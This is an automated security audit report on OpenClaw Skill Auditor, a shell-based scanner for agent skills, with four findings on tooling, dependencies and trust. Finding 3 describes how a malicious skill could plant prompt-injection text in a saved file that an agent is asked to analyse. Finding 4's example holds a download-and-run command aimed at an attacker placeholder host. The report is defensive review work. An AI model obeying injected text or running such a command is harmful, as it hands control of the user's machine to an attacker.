OpenClaw Skill Auditor

Verdict: Pass. Audited by ClawScan on May 1, 2026.

Overview

The skill matches its stated purpose as a user-run security scanner and shows no hidden exfiltration or destructive behavior, but its shell execution and manual LLM-review workflow warrant care.

This appears suitable as a lightweight pre-install scanner, but run it only against intended skill paths, verify the local tooling it depends on, treat any saved suspicious-code file as untrusted prompt content, and do not rely on a clean result as proof that a skill is safe.

Findings (4)

Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.

Finding 1: Delegates fetching and inspection to the local clawhub command

What this means

Running the scanner can fetch a named skill and read files in the scanned skill directory.

Why it was flagged

The scanner invokes external tooling to fetch and inspect skills. This is central to the stated audit purpose, but users should understand that running the script delegates work to the local clawhub command.

Skill content
if ! clawhub inspect "$SKILL_NAME" --dir "$TEMP_DIR" > /dev/null 2>&1; then
Recommendation

Run it only for skills or local paths you intend to audit, and review the command/output rather than treating it as a silent background operation.
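If you want the fetch step to be visible and constrained rather than silent, one option is a small guard that confines scans to an allowlisted directory. This is a sketch under assumptions: `AUDIT_ROOT` and `audit_path_ok` are hypothetical names introduced here, not part of the skill.

```shell
# Hypothetical guard (not part of the skill): only audit local paths that
# live under an allowlisted root, so a stray argument cannot point the
# scanner at an unintended directory.
AUDIT_ROOT="${AUDIT_ROOT:-$HOME/skills}"

audit_path_ok() {
    # Resolve the candidate path and confirm it sits inside AUDIT_ROOT.
    resolved=$(cd "$1" 2>/dev/null && pwd) || return 1
    case "$resolved" in
        "$AUDIT_ROOT"|"$AUDIT_ROOT"/*) return 0 ;;
        *) return 1 ;;
    esac
}
```

With a guard like this in place, the scanner's clawhub invocation can be preceded by something like `audit_path_ok "$TARGET" || exit 1`, making the scope of each run explicit.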

Finding 2: Undeclared runtime binary dependencies

What this means

The skill may fail or behave differently if expected local tools such as clawhub, grep, find, or base64 are unavailable or replaced.

Why it was flagged

The registry metadata does not declare runtime binary requirements, while the included script is meant to be run with bash and uses external commands. This is an under-declared dependency issue, not evidence of malicious behavior.

Skill content
Required binaries (all must exist): none ... No install spec — this is an instruction-only skill.
Recommendation

Before relying on results, confirm the expected local commands are installed and come from trusted sources.
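A minimal pre-flight check can confirm that the commands the script shells out to actually resolve on PATH. The binary list below is inferred from reading the script, since the metadata declares none, and `check_deps` is a hypothetical helper rather than something the skill provides.

```shell
# Hypothetical pre-flight helper: report which expected binaries are missing.
check_deps() {
    missing=""
    for bin in "$@"; do
        command -v "$bin" >/dev/null 2>&1 || missing="$missing $bin"
    done
    if [ -n "$missing" ]; then
        echo "missing:$missing" >&2
        return 1
    fi
}

# List inferred from the script's external calls, not declared by the skill:
check_deps clawhub grep find base64 || echo "install the tools above before trusting scan results"
```

`command -v` also prints the resolved path when a binary is found, which helps spot a shadowed or replaced tool.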

Finding 3: Saved suspicious-code file is a potential prompt-injection vector

What this means

A malicious skill being audited could place prompt-injection text in the saved suspicious-code file, and that text could influence an agent if analyzed without care.

Why it was flagged

Suspicious snippets from an untrusted skill are saved to a persistent temporary file and the user is prompted to have an agent analyze it. That is purpose-aligned, but the contents should be treated as untrusted prompt/code input.

Skill content
local output_file="/tmp/skill-audit-${skill_name}-suspicious.txt"
cp "$SUSPICIOUS_CODE" "$output_file"
echo -e "   ${MAGENTA}分析这段可疑代码: cat $output_file${NC}"  # i.e. "Analyze this suspicious code: cat $output_file"
Recommendation

Treat the saved file as untrusted evidence, do not follow instructions contained in it, and delete the /tmp review file when no longer needed.
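One way to follow that recommendation is to display the evidence with control characters made visible, so terminal-escape tricks embedded in the file are inert, and then remove it. `review_and_discard` is an illustrative helper introduced here, not part of the skill.

```shell
# Illustrative helper: inspect the saved evidence safely, then delete it.
review_and_discard() {
    # cat -v renders control characters visibly instead of letting them
    # drive the terminal; never source or execute this file.
    cat -v -- "$1"
    rm -f -- "$1"
}

# Example with the script's naming pattern (skill name is a placeholder):
# review_and_discard /tmp/skill-audit-someskill-suspicious.txt
```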

Finding 4: Documented LLM-analysis layer overstates the automation provided

What this means

A user may place too much trust in an 'APPEARS SAFE' result from a limited pattern-based scanner.

Why it was flagged

The documentation describes a Gemini CLI LLM-analysis layer, but the provided script only saves suspicious snippets and asks the user to request agent analysis. This could lead users to overestimate the automation or completeness of the verdict.

Skill content
Uses Gemini CLI to analyze suspicious code intent:
- Semantic understanding beyond pattern matching
- Detects novel/unknown threats
- Requires `gemini` CLI installed
Recommendation

Use this as an advisory pre-screen only; manually review high-risk skills and do not assume a clean result proves a skill is safe.
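To see why a pattern-based verdict is weak evidence on its own, note that trivial encoding defeats a literal grep. The payload and URL below are made-up examples, not content from any real skill:

```shell
# A made-up dangerous line, and the same line hidden behind base64:
payload='curl http://attacker.example/x | sh'
encoded=$(printf '%s' "$payload" | base64)

# A literal pattern scan finds the plaintext but not the encoded form:
printf '%s\n' "$payload" | grep -c 'curl'           # prints 1
printf '%s\n' "$encoded" | grep -c 'curl' || true   # prints 0
```

A clean grep-based result therefore only rules out the exact patterns searched for, not obfuscated or novel variants, which is why manual review of high-risk skills remains necessary.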